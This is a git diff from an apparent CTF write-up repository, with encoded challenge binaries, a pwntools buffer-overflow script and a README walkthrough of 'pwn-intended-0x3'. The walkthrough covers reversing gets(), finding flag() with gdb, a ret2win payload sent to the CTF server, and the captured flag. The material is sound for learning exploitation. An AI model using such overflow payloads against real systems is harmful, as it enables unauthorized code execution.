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
JpMg&l{{*mu-0c7W

literal 0
HcmV?d00001

diff --git a/Pwn/pwn intended 0x2/rev_exploit.py b/Pwn/pwn intended 0x2/rev_exploit.py
new file mode 100644
index 0000000..12c4835
--- /dev/null
+++ b/Pwn/pwn intended 0x2/rev_exploit.py	
@@ -0,0 +1,10 @@
+#!/usr/bin/env python3
+
+import pwn
+
+r = pwn.remote('chall.csivit.com', 30007)
+
+payload = "A"*44 + '\xbe\xba\xfe\xca'
+
+r.sendline(payload)
+r.interactive()
diff --git a/Pwn/pwn-intended-0x3/README.md b/Pwn/pwn-intended-0x3/README.md
new file mode 100644
index 0000000..f3bb504
--- /dev/null
+++ b/Pwn/pwn-intended-0x3/README.md
@@ -0,0 +1,76 @@
+## pwn-intended-0x3
+The main idea finding the flag is overwrite the correct hex after padding.
+
+#### Step-1:
+After I downloaded `pwn-intended-0x3`, I reversed it with IDA, I got this source code:
+
+**main()** function:
+```c
+undefined8 main(void)
+
+{
+  char local_28 [32];
+
+  setbuf(stdout,(char *)0x0);
+  setbuf(stdin,(char *)0x0);
+  setbuf(stderr,(char *)0x0);
+  puts("Welcome to csictf! Time to teleport again.");
+  gets(local_28);
+  return 0;
+}
+```
+
+**flag()** function:
+```c
+void flag(void)
+
+{
+  puts("Well, that was quick. Here\'s your flag:");
+  system("cat flag.txt");
+                    /* WARNING: Subroutine does not return */
+  exit(0);
+}
+```
+
+#### Step-2:
+I just had to write the address of the flag function after 32+8 bytes.
+
+So I tried using Debugger to get the address of the flag.
+
+```bash
+echo into functions | gdb ./pwn-intended-0x3 | grep flag
+```
+I got this output: `0x00000000004011ce  flag`
+
+#### Step-3:
+I wrote a very common `rev_exploit.py` to pwn into the machine.
+
+```python
+import pwn
+
+r = pwn.remote('chall.csivit.com', 30013)
+
+payload = "A"*40 + '\xce\x11@\x00\x00\x00\x00\x00'
+
+r.sendline(payload)
+r.interactive()
+```
+
+#### Step-4:
+When I finally ran this `python3 rev_exploit.py`, I got this output:
+
+```bash
+[+] Opening connection to chall.csivit.com on port 30013: Done
+[*] Switching to interactive mode
+Welcome to csictf! Time to teleport again.
+Well, that was quick. Here's your flag:
+You've reached your destination, here's a flag!
+csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}[*] Got EOF while reading in interactive 
+$
+[*] Interrupted
+```
+Voila! I got the flag there.
+
+#### Step-5:
+Finally the flag becomes:
+`csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}`
\ No newline at end of file
diff --git a/Pwn/pwn-intended-0x3/pwn-intended-0x3 b/Pwn/pwn-intended-0x3/pwn-intended-0x3
new file mode 100644
index 0000000000000000000000000000000000000000..f075f4e3d00b35fe106192ee799cedb0c01a9b59
GIT binary patch
literal 16944
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
SXW07oXScW-5ubriRR00t3F#03

literal 0
HcmV?d00001